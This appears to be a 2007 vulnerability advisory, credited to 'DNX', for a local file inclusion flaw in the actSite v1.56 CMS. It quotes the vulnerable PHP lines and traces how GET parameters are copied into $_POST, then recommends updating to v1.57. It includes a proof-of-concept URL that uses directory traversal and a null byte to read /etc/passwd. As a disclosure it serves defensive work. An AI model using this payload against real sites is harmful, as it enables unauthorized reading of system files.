\#'#/ (-.-) -----------------oOO---(_)---OOo----------------- | actSite v1.56 (news.php) Local File Inclusion | | coded by DNX | ------------------------------------------------- [!] Discovered: DNX [!] Vendor: http://www.actsite.de [!] Detected: 02.09.2007 [!] Reported: 02.09.2007 [!] Remote: yes [!] Background: actSite is a content management system based on PHP and MySQL [!] Bug: in phpinc/news.php line 101 require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php"; [!] PoC: - http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00 [!] Description: - So why we can inject code in a post variable per url? Let's do some research... - In phpinc/news.php line 36 require_once('../config.php'); - Let's take a look in 'config.php' line 22 if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php"); - Ok, let's take a look in 'phpinc/inc/csb.php' line 18 if(getenv('REQUEST_METHOD') == "GET") { foreach($_GET as $key => $val) { $_POST[$key] =& $_GET[$key]; } } [!] Solution: Install security update to v1.57